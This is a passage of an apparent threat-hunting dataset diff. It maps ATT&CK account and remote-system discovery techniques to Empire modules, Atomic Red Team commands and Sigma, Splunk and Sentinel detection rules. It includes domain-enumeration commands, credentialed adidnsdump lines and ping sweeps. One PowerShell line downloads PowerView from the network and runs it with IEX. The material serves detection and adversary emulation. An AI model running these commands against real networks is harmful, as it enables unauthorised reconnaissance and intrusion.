"Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_user\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/user_hunter", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/user_hunter\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/dscl_get_groupmembers", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/dscl_get_groupmembers\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/dscl_get_groups", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/dscl_get_groups\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/dscl_get_users", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/dscl_get_users\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_groupmembers", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_groupmembers\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_groupmemberships", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_groupmemberships\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_groups", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_groups\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_ous", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_ous\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_userinformation", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_userinformation\": [\"T1087\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_users", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_users\": [\"T1087\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"or process_path contains \"powershell.exe\")and (process_command_line contains \"*net* user*\"or process_command_line contains \"*net* group*\"or process_command_line contains \"*net* localgroup*\"or process_command_line contains \"cmdkey*\\\\/list*\"or process_command_line contains \"*get-localuser*\"or process_command_line contains \"*get-localgroupmembers*\"or process_command_line contains \"*get-aduser*\"or process_command_line contains \"query*user*\")", + "name": "Account Discovery" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history cat /etc/passwd | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history cat /etc/sudoers | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history \"lsof -u *\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history lastlog | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history group OR id | table host,user_name,bash_command", + "name": "" + } + ], + "possible_detections": [ + "bash_history logs", + { + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "references": [ + "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html" + ], + "tags": [ + "attack.discovery", + "attack.t1087" + ], + "status": "experimental", + "author": "Samir Bousseaden", + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: enable Object Access SAM on your Domain Controllers" + }, + "detection": { + "selection": { + "EventID": 4661, + "ObjectType": [ + "SAM_USER", + "SAM_GROUP" + ], + "ObjectName": [ + "*-512", + "*-502", + "*-500", + "*-505", + "*-519", + "*-520", + "*-544", + "*-551", + "*-555", + "*admin*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "if source account name is not an admin then its super suspicious" + ], + "level": "high" + }, + { + "title": "Local Accounts Discovery", + "id": "502b42de-4306-40b4-9596-6f590c81f073", + "status": "experimental", + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_1": [ + { + "Image|endswith": "\\whoami.exe" + }, + { + "Image|endswith": "\\wmic.exe", + "CommandLine|contains|all": [ + "useraccount", + "get" + ] + }, + { + "Image|endswith": [ + "\\quser.exe", + "\\qwinsta.exe" + ] + }, + { + "Image|endswith": "\\cmdkey.exe", + "CommandLine|contains": "/list" + }, + { + "Image|endswith": "\\cmd.exe", + "CommandLine|contains|all": [ + "/c", + "dir", + "\\Users\\" + ] + } + ], + "selection_2": { + "Image|endswith": [ + "\\net.exe", + "\\net1.exe" + ], + "CommandLine|contains": "user" + }, + "filter": { + "CommandLine|contains": [ + "/domain", + "/add", + "/delete", + "/active", + "/expires", + "/passwordreq", + "/scriptpath", + "/times", + "/workstations" + ] + }, + "condition": "selection_1 or ( selection_2 and not filter )" + }, + "fields": [ + "Image", + "CommandLine", + "User", + "LogonGuid", + "Hashes", + "ParentProcessGuid", + "ParentCommandLine" + ], + "falsepositives": [ + "Legitimate administrator or user enumerates local users for legitimate reason" + ], + "level": "low", + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1087" + ] + }, + { + "title": "Suspicious Reconnaissance Activity", + "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "status": "experimental", + "description": "Detects suspicious command line activity on Windows systems", + "author": "Florian Roth", + "tags": [ + "attack.discovery", + "attack.t1087" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "net group \"domain admins\" /domain", + "net localgroup administrators" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Inventory tool runs", + "Penetration tests", + "Administrative activity" + ], + "analysis": { + "recommendation": "Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)" + }, + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1018", + "command_list": [ + "net group \"Domain Computers\" /domain[:DOMAIN]", + "net group \"Domain Computers\" /domain", + "\npost/windows/gather/enum_ad_computers\npost/windows/gather/enum_computers", + "net group \"Domain Controllers\" /domain[:DOMAIN]", + "net group \"Domain Controllers\" /domain", + "nltest /dclist[:domain]", + "echo %LOGONSERVER%", + "shell echo %LOGONSERVER%", + "net view /domain\nnet view\n", + "net group \"Domain Computers\" /domain\n", + "nltest.exe /dclist:%userdnsdomain%\n", + "for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i\n", + "arp -a\n", + "arp -a | grep -v '^?'\n", + "for ip in $(seq 1 #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo \"#{subnet}.$ip UP\" || : ; done\n", + "for ip in $(seq #{start_host} 254); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo \"#{subnet}.$ip UP\" || : ; done\n", + "for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo \"192.168.1.$ip UP\" || : ; done\n", + "$localip = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\n$pieces = $localip.split(\".\")\n$firstOctet = $pieces[0]\n$secondOctet = $pieces[1]\n$thirdOctet = $pieces[2]\nforeach ($ip in 1..255 | % { \"$firstOctet.$secondOctet.$thirdOctet.$_\" } ) {cmd.exe /c nslookup $ip}\n", + "adidnsdump -u domain\\user -p #{acct_pass} --print-zones #{host_name}\n", + "adidnsdump -u #{user_name} -p password --print-zones #{host_name}\n", + "adidnsdump -u #{user_name} -p #{acct_pass} --print-zones 192.168.1.1\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=computer)\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc dclist\n", + "ip neighbour show\n", + "ip route show\n", + "ip tcp_metrics show |grep --invert-match \"^127\\.\"\n", + "$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher(\"(ObjectCategory=Computer)\")\n$DirectorySearcher.PropertiesToLoad.Add(\"Name\")\n$Computers = $DirectorySearcher.findall()\nforeach ($Computer in $Computers) {\n $Computer = $Computer.Properties.name\n if (!$Computer) { Continue }\n Write-Host $Computer}\n", + "Get-AdComputer -Filter *\n", + "([adsisearcher]\"objectcategory=computer\").FindAll(); ([adsisearcher]\"objectcategory=computer\").FindOne()\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose\n", + "get-wmiobject -class ds_computer -namespace root\\directory\\ldap", + "Import-Module .\\PowerView.ps1 -Force;\nGet-NetComputer\n", + "Import-Module .\\powerview.ps1;\nGet-DomainComputer\n", + "nltest /dsgetdc:%USERDOMAIN%\n", + "nltest /dsgetdc:$env:USERDOMAIN\n", + "cat ~/.ssh/known_hosts\n", + "arp -a", + "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev", + "(nslookup -querytype=mx #{target.org.domain}. | Select-String -pattern 'mail' | Out-String).Trim()\n", + "nslookup #{remote.host.ip}\n", + "nbtstat -A #{remote.host.ip}", + "net.exe view /domain", + "qwinsta.exe /server:", + "installutil.exe /logfile= /LogToConsole=false /U *.dll", + "powershell/situational_awareness/network/powerview/get_domain_controller", + "powershell/situational_awareness/network/powerview/get_domain_policy", + "powershell/situational_awareness/network/powerview/get_domain_trust", + "powershell/situational_awareness/network/powerview/get_forest", + "powershell/situational_awareness/network/powerview/get_forest_domain", + "powershell/situational_awareness/network/powerview/get_site", + "powershell/situational_awareness/network/reverse_dns", + "python/situational_awareness/network/active_directory/get_computers", + "python/situational_awareness/network/active_directory/get_domaincontrollers", + "python/situational_awareness/network/gethostbyname" + ], + "commands": [ + { + "command": "net group \"Domain Computers\" /domain[:DOMAIN]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "net group \"Domain Computers\" /domain", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "\npost/windows/gather/enum_ad_computers\npost/windows/gather/enum_computers", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "net group \"Domain Controllers\" /domain[:DOMAIN]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "net group \"Domain Controllers\" /domain", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "nltest /dclist[:domain]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "echo %LOGONSERVER%", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell echo %LOGONSERVER%", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "net view /domain\nnet view\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "net group \"Domain Computers\" /domain\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "nltest.exe /dclist:%userdnsdomain%\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "arp -a\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "arp -a | grep -v '^?'\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "for ip in $(seq 1 #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo \"#{subnet}.$ip UP\" || : ; done\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "for ip in $(seq #{start_host} 254); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo \"#{subnet}.$ip UP\" || : ; done\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo \"192.168.1.$ip UP\" || : ; done\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "$localip = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\n$pieces = $localip.split(\".\")\n$firstOctet = $pieces[0]\n$secondOctet = $pieces[1]\n$thirdOctet = $pieces[2]\nforeach ($ip in 1..255 | % { \"$firstOctet.$secondOctet.$thirdOctet.$_\" } ) {cmd.exe /c nslookup $ip}\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "adidnsdump -u domain\\user -p #{acct_pass} --print-zones #{host_name}\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "adidnsdump -u #{user_name} -p password --print-zones #{host_name}\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "adidnsdump -u #{user_name} -p #{acct_pass} --print-zones 192.168.1.1\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=computer)\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc dclist\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "ip neighbour show\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "ip route show\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "ip tcp_metrics show |grep --invert-match \"^127\\.\"\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher(\"(ObjectCategory=Computer)\")\n$DirectorySearcher.PropertiesToLoad.Add(\"Name\")\n$Computers = $DirectorySearcher.findall()\nforeach ($Computer in $Computers) {\n $Computer = $Computer.Properties.name\n if (!$Computer) { Continue }\n Write-Host $Computer}\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "Get-AdComputer -Filter *\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "([adsisearcher]\"objectcategory=computer\").FindAll(); ([adsisearcher]\"objectcategory=computer\").FindOne()\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "get-wmiobject -class ds_computer -namespace root\\directory\\ldap", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "Import-Module .\\PowerView.ps1 -Force;\nGet-NetComputer\n", + "source": "data/abilities/discovery/0360ede1-3c28-48d3-a6ef-6e98f562c5af.yml", + "name": "Get a list of all computers in a domain" + }, + { + "command": "Import-Module .\\powerview.ps1;\nGet-DomainComputer\n", + "source": "data/abilities/discovery/13379ae1-d20e-4162-91f8-320d78a35e7f.yml", + "name": "Use PowerView to query the Active Directory server for a list of computers in the Domain" + }, + { + "command": "nltest /dsgetdc:%USERDOMAIN%\n", + "source": "data/abilities/discovery/26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml", + "name": "Identify the remote domain controllers" + }, + { + "command": "nltest /dsgetdc:$env:USERDOMAIN\n", + "source": "data/abilities/discovery/26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml", + "name": "Identify the remote domain controllers" + }, + { + "command": "cat ~/.ssh/known_hosts\n", + "source": "data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml", + "name": "View the known_hosts file" + }, + { + "command": "arp -a", + "source": "data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml", + "name": "Locate all active IP and FQDNs on the network" + }, + { + "command": "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev", + "source": "data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml", + "name": "Identify the organizations mail server" + }, + { + "command": "(nslookup -querytype=mx #{target.org.domain}. | Select-String -pattern 'mail' | Out-String).Trim()\n", + "source": "data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml", + "name": "Identify the organizations mail server" + }, + { + "command": "nslookup #{remote.host.ip}\n", + "source": "data/abilities/discovery/fa4ed735-7006-4451-a578-b516f80e559f.yml", + "name": "Find hostname of remote IP in domain" + }, + { + "command": "nbtstat -A #{remote.host.ip}", + "source": "data/abilities/discovery/fdf8bf36-797f-4157-805b-fe7c1c6fc903.yml", + "name": "Find hostname of remote host" + }, + { + "command": "net.exe view /domain", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "qwinsta.exe /server:", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "installutil.exe /logfile= /LogToConsole=false /U *.dll", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_domain_controller", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_domain_policy", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_domain_trust", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_forest", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_forest_domain", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_site", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/reverse_dns", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_computers", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_domaincontrollers", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/gethostbyname", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1018", + "Built-in Windows Command": "net group \"Domain Computers\" /domain[:DOMAIN]", + "Cobalt Strike": "net group \"Domain Computers\" /domain", + "Metasploit": "\npost/windows/gather/enum_ad_computers\npost/windows/gather/enum_computers", + "Description": "Display the list of domain computers in the domain by showing their computer accounts (COMP_NAME$)" + }, + { + "Category": "T1018", + "Built-in Windows Command": "net group \"Domain Controllers\" /domain[:DOMAIN]", + "Cobalt Strike": "net group \"Domain Controllers\" /domain", + "Metasploit": "", + "Description": "Display the list of domain controllers in the network" + }, + { + "Category": "T1018", + "Built-in Windows Command": "nltest /dclist[:domain]", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "Display the trust relationship between the workstation and the domain - must be elevated to use this!" + }, + { + "Category": "T1018", + "Built-in Windows Command": "echo %LOGONSERVER%", + "Cobalt Strike": "shell echo %LOGONSERVER%", + "Metasploit": "", + "Description": "Display the active directory login server of the workstation " + }, + { + "attack_technique": "T1018", + "display_name": "Remote System Discovery", + "atomic_tests": [ + { + "name": "Remote System Discovery - net", + "auto_generated_guid": "85321a9c-897f-4a60-9f20-29788e50bccd", + "description": "Identify remote systems with net.exe.\n\nUpon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net view /domain\nnet view\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - net group Domain Computers", + "auto_generated_guid": "f1bf6c8f-9016-4edf-aff9-80b65f5d711f", + "description": "Identify remote systems with net.exe querying the Active Directory Domain Computers group.\n\nUpon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the \"Domain Computers\" group. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net group \"Domain Computers\" /domain\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - nltest", + "auto_generated_guid": "52ab5108-3f6f-42fb-8ba3-73bc054f22c8", + "description": "Identify domain controllers for specified domain.\n\nUpon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_domain": { + "description": "Domain to query for domain controllers", + "type": "String", + "default": "%userdnsdomain%" + } + }, + "executor": { + "command": "nltest.exe /dclist:#{target_domain}\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - ping sweep", + "auto_generated_guid": "6db1f57f-d1d5-4223-8a66-55c9c65a9592", + "description": "Identify remote systems via ping sweep.\n\nUpon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i\n", + "name": 